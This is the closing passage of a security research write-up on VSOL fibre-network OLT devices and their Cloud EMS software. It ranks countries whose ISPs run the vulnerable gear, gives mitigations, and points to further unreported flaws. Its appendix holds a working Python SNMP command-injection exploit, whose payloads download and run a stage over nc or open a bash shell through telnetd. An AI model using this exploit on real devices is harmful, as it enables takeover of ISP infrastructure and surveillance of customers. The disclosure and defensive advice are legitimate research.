cloud based fleet managers directly to the internet.</p>
<blockquote>
<p>🌎 <u>Countries where ISPs use vulnerable devices (non-exhaustive):</u></p>
<p>During the research, I also identified ISPs in multiple countries deploying OLT
devices affected by the vulnerabilities. However, the geopolitical significance
of these findings varies depending on the country in question. From an
espionage perspective, not all compromised infrastructure offers the same
strategic value. At the top of the spectrum are countries like the United
States, India, Turkey, Taiwan, Brazil, and Mexico, where vulnerable OLTs were
found in active use by ISPs. These nations hold considerable weight in global
politics, economics, or technology, making any foothold in their
telecommunications infrastructure potentially valuable for state-level or
threat actors. A second tier of interest includes Pakistan, South Africa,
Indonesia, the Philippines, and Argentina. All of which host ISPs operating
vulnerable devices. These countries play important regional roles or control
strategic sectors that could be leveraged in broader intelligence campaigns.
Singapore, despite its small geographic size, also appears in this group due to
its outsized importance as a financial and technological hub in Southeast Asia.</p>
</blockquote>
<h3 id="mitigations-for-the-olts">Mitigations for the OLTs</h3>
<p>ISP should enforce a mandatory devices password change and prohibit the use of
vendor supplied default credentials. Each device must use unique, strong, device
specific passwords.</p>
<p>Access to device management services, including SNMP, web-based management
interfaces, and TACACS+ authentication, must be strictly limited to dedicated
and trusted management networks. This restriction should be enforced through
network-level mechanisms such as ACLs or firewall policies.</p>
<p>Management services and features that are not strictly required for operational
purposes must be disabled wherever possible. When certain services cannot be
disabled due to operational dependencies, additional hardening measures must be
applied. In particular, when SNMP is required for device administration or
monitoring, default community strings must be changed to long, complex, and
non-guessable values in order to mitigate the risk of brute-force attacks.</p>
<h3 id="mitigations-for-cloud-ems">Mitigations for Cloud EMS</h3>
<p>In the absence of a vendor provided patch for the Cloud EMS vulnerabilities,
ISPs must implement compensating controls to reduce the risk of Information
Leakage and Arbitrary File Upload.</p>
<p>Because access to the Docker socket can allow container escape and potentially
compromise the host system, ISPs must maintain heightened vigilance and
continuously monitor system and container logs for signs of suspicious activity.
Any compromise of the web server may allow an attacker not only to target
connected OLTs but also to interact with the host environment outside the
container.</p>
<h3 id="overview-of-mitigation-measures">Overview of mitigation measures</h3>
<p>These measures constitute compensating mitigations and do not eliminate the
underlying vulnerabilities. They are intended to reduce the attack surface and
associated risk until a permanent remediation is provided by the vendor.</p>
<p>Finally, ISPs should monitor access logs to detect and respond to potential
exploitation attempts. IOCs can be established based on the different POC
presented in the article.</p>
<h2 id="going-further_1">Going further</h2>
<p>I focused solely on trivial vulnerabilities because they are generally safer to
exploit during Red Team exercises. It is possible that even more critical
vulnerabilities remain undiscovered and exploitable, who knows? (answer: yes)</p>
<blockquote>
<p>For the Web people not everything has been discovered yet, there is still much
to explore. For instance, the V1600GS-O32 model is vulnerable to a stored XSS
via the route <span class="color-blue">/action/ntp.html</span> (look at the
functions <code>webs_system_ntp()</code> and <code>vsWebInputCheck()</code> within the
<span class="color-red">gpond</span> binary). While I have highlighted only one
memory corruption vulnerability (Buffer Overflow), during reverse engineering,
I also spotted multiple Stack-based Buffer Overflows and Heap-based Buffer
Overflows.</p>
</blockquote>
<p>Once the OLT fleet has been compromised, the attacker can go beyond just
controllong the core network. All ONTs (Optical Network Terminations) connected
to OLTs become potential targets. These terminals, often located at customer
locations, are managed remotely through the OLT using the OMCI (ONT Management
and Control Interface) protocol. Although OMCI is designed to allow operators to
remotely configure, monitor, and update ONTs, in the hands of an attacker, it
becomes a tool for massive exploitation.</p>
<p>By controlling the OLTs, an attacker can use OMCI to interact with each
connected ONT, potentially reconfiguring devices, installing malicious firmware,
or hijacking user traffic. In some scenarios, this access could lead to total
control of customer routers to perform undetectable surveillance.</p>
<h2 id="references">References</h2>
<ul>
<li>
<p>[1] <a href="https://www.vsolcn.com/">VSOL website</a></p>
</li>
<li>
<p>[2] <a href="https://www.vsolcn.com/about">Who we are ("About Us" section of VSOL website)</a></p>
</li>
<li>
<p>[3] <a href="https://www.vsolcn.com/blog/guide-to-install-bsems.html">Guide to install V-SOL <i>Cloud BS-EMS</i> (Windows&Linux)</a></p>
</li>
<li>
<p>[4] <a href="https://www.vsolcn.com/down/cloud-ems-software"><i>Cloud EMS</i> software (download page)</a></p>
</li>
<li>
<p>[5] <a href="https://docs.docker.com/engine/containers/run/#runtime-privilege-and-linux-capabilities">Runtime privilege and Linux capabilities (Docker documentation: Running containers)</a></p>
</li>
<li>
<p>[6] <a href="https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/filter/DelegatingFilterProxy.html">Class DelegatingFilterProxy (<i>Spring</i> documentation)</a></p>
</li>
<li>
<p>[7] <a href="https://www.embedthis.com/goahead/doc/">Embedthis GoAhead (doc)</a></p>
</li>
<li>
<p>[8] <a href="https://www.embedthis.com/goahead/doc/ref/api/goahead.html">GOAHEAD API</a></p>
</li>
</ul>
<h2 id="appendix">Appendix</h2>
<h3 id="python-exploit-for-the-snmp-handler">Python exploit for the SNMP handler</h3>
<p>File: <span class="color-red">exploit.py</span></p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">asyncio</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">from</span> <span class="nn">pysnmp.hlapi.v3arch.asyncio</span> <span class="kn">import</span> <span class="o">*</span>
<span class="c1"># Target device IP address and SNMP port.</span>
<span class="n">TARGET_IP</span> <span class="o">=</span> <span class="s2">"192.168.8.200"</span>
<span class="n">TARGET_PORT</span> <span class="o">=</span> <span class="mi">161</span>
<span class="c1"># SNMP community string for authentication.</span>
<span class="n">COMMUNITY</span> <span class="o">=</span> <span class="s2">"private"</span>
<span class="c1"># SNMP Object Identifiers (OIDs) used for the exploit.</span>
<span class="n">OID_DEST_IP</span> <span class="o">=</span> <span class="s2">"1.3.6.1.4.1.37950.1.1.5.10.12.33.1.0"</span> <span class="c1"># Vector of injection.</span>
<span class="n">OID_TYPE</span> <span class="o">=</span> <span class="s2">"1.3.6.1.4.1.37950.1.1.5.10.12.33.2.0"</span> <span class="c1"># Set type to IPv4.</span>
<span class="n">OID_ACTION</span> <span class="o">=</span> <span class="s2">"1.3.6.1.4.1.37950.1.1.5.10.12.33.3.0"</span> <span class="c1"># Trigger the vulnerability.</span>
<span class="c1"># Implant type: Determines which set of commands to send.</span>
<span class="n">IMPLANT_TYPE</span> <span class="o">=</span> <span class="s2">"BIND"</span> <span class="c1"># Other accepted value: ("REVERSE", "BIND").</span>
<span class="c1"># Listening port for BIND implants.</span>
<span class="n">LISTENING_PORT</span> <span class="o">=</span> <span class="mi">4444</span>
<span class="c1"># Commands to send depending on implant type.</span>
<span class="n">COMMANDS</span> <span class="o">=</span> <span class="p">[</span>
<span class="p">[</span>
<span class="s2">"nc 192.168.8.199 1338 > /tmp/stage0"</span><span class="p">,</span> <span class="c1"># First stage download.</span>
<span class="s2">"bash /tmp/stage0"</span> <span class="c1"># Execute downloaded stage.</span>
<span class="p">],</span>
<span class="p">[</span>
<span class="sa">f</span><span class="s2">"iptables -A INPUT -p tcp --dport </span><span class="si">{</span><span class="n">LISTENING_PORT</span><span class="si">}</span><span class="s2"> -j ACCEPT"</span><span class="p">,</span> <span class="c1"># Allow TCP on port 4444.</span>
<span class="sa">f</span><span class="s2">"iptables -A INPUT -p udp --dport </span><span class="si">{</span><span class="n">LISTENING_PORT</span><span class="si">}</span><span class="s2"> -j ACCEPT"</span><span class="p">,</span> <span class="c1"># Allow UDP on port 4444.</span>
<span class="sa">f</span><span class="s2">"telnetd -p</span><span class="si">{</span><span class="n">LISTENING_PORT</span><span class="si">}</span><span class="s2"> -l/bin/bash"</span> <span class="c1"># Start telnet daemon on port 4444 with bash shell.</span>
<span class="p">]</span>
<span class="p">]</span>
<span class="k">async</span> <span class="k">def</span> <span class="nf">snmp_set</span><span class="p">(</span><span class="n">oid</span><span class="p">,</span> <span class="n">value_type</span><span class="p">,</span> <span class="n">value</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""</span>
<span class="sd"> Perform an SNMP SET operation asynchronously.</span>
<span class="sd"> Args:</span>
<span class="sd"> oid (str): The OID to set.</span>
<span class="sd"> value_type (str): The SNMP data type ('i' for Integer, 's' for String).</span>
<span class="sd"> value (str or int): The value to set for the OID.</span>
<span class="sd"> Raises:</span>
<span class="sd"> ValueError: If an unsupported SNMP data type is specified.</span>
<span class="sd"> """</span>
<span class="c1"># Convert Python value to appropriate SNMP type.</span>
<span class="k">if</span> <span class="n">value_type</span> <span class="o">==</span> <span class="s2">"i"</span><span class="p">:</span>
<span class="n">snmp_value</span> <span class="o">=</span> <span class="n">Integer32</span><span class="p">(</span><span class="n">value</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">value_type</span> <span class="o">==</span> <span class="s2">"s"</span><span class="p">:</span>
<span class="n">snmp_value</span> <span class="o">=</span> <span class="n">OctetString</span><span class="p">(</span><span class="n">value</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">raise</span> <span class="ne">ValueError</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Unsupported SNMP type: </span><span class="si">{</span><span class="n">value_type</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="c1"># Create SNMP engine instance.</span>
<span class="n">snmp_engine</span> <span class="o">=</span> <span class="n">SnmpEngine</span><span class="p">()</span>
<span class="c1"># Create SNMP SET command iterator with parameters:</span>
<span class="c1"># community, target IP and port, context, and variable bindings.</span>
<span class="n">iterator</span> <span class="o">=</span> <span class="n">set_cmd</span><span class="p">(</span>
<span class="n">snmp_engine</span><span class="p">,</span>
<span class="n">CommunityData</span><span class="p">(</span><span class="n">COMMUNITY</span><span class="p">,</span> <span class="n">mpModel</span><span class="o">=</span><span class="mi">1</span><span class="p">),</span>
<span class="k">await</span> <span class="n">UdpTransportTarget</span><span class="o">.</span><span class="n">create</span><span class="p">((</span><span class="n">TARGET_IP</span><span class="p">,</span> <span class="n">TARGET_PORT</span><span class="p">)),</span>
<span class="n">ContextData</span><span class="p">(),</span>
<span class="n">ObjectType</span><span class="p">(</span><span class="n">ObjectIdentity</span><span class="p">(</span><span class="n">oid</span><span class="p">),</span> <span class="n">snmp_value</span><span class="p">),</span>
<span class="p">)</span>
<span class="c1"># Await the response from SNMP agent.</span>
<span class="n">error_indication</span><span class="p">,</span> <span class="n">error_status</span><span class="p">,</span> <span class="n">error_index</span><span class="p">,</span> <span class="n">var_binds</span> <span class="o">=</span> <span class="k">await</span> <span class="n">iterator</span>
<span class="c1"># Close SNMP dispatcher to clean up resources.</span>
<span class="n">snmp_engine</span><span class="o">.</span><span class="n">close_dispatcher</span><span class="p">()</span>
<span class="c1"># Select commands list based on implant type.</span>
<span class="k">if</span> <span class="n">IMPLANT_TYPE</span> <span class="o">==</span> <span class="s2">"REVERSE"</span><span class="p">:</span>
<span class="n">commands</span> <span class="o">=</span> <span class="n">COMMANDS</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
<span class="k">elif</span> <span class="n">IMPLANT_TYPE</span> <span class="o">==</span> <span class="s2">"BIND"</span><span class="p">:</span>
<span class="n">commands</span> <span class="o">=</span> <span class="n">COMMANDS</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">commands</span> <span class="o">=</span> <span class="p">[]</span>
<span class="c1"># Iterate over each command in the selected list and send it via SNMP.</span>
<span class="k">for</span> <span class="n">command</span> <span class="ow">in</span> <span class="n">commands</span><span class="p">:</span>
<span class="c1"># Set destination IP with command string.</span>
<span class="n">asyncio</span><span class="o">.</span><span class="n">run</span><span class="p">(</span><span class="n">snmp_set</span><span class="p">(</span><span class="n">OID_DEST_IP</span><span class="p">,</span> <span class="s2">"s"</span><span class="p">,</span> <span class="sa">f</span><span class="s2">"8.8.8.8</span><span class="se">\n</span><span class="si">{</span><span class="n">command</span><span class="si">}</span><span class="se">\n</span><span class="s2">"</span><span class="p">))</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="c1"># Set the type to IPv4.</span>
<span class="n">asyncio</span><span class="o">.</span><span class="n">run</span><span class="p">(</span><span class="n">snmp_set</span><span class="p">(</span><span class="n">OID_TYPE</span><span class="p">,</span> <span class="s2">"i"</span><span class="p">,</span> <span class="mi">4</span><span class="p">))</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="c1"># Trigger the vulnerability by setting action to 1.</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"[*] Executing command: </span><span class="si">{</span><span class="n">command</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="n">asyncio</span><span class="o">.</span><span class="n">run</span><span class="p">(</span><span class="n">snmp_set</span><span class="p">(</span><span class="n">OID_ACTION</span><span class="p">,</span> <span class="s2">"i"</span><span class="p">,</span> <span class="mi">1</span><span class="p">))</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</code></pre></div>
<h3 id="list-of-oids-retrieved-through-reflection">List of OIDs retrieved through reflection</h3>
<ul>
<li><a href="resources/2026-05-19_vsol/oids.md">oids.md</a></li>
</ul>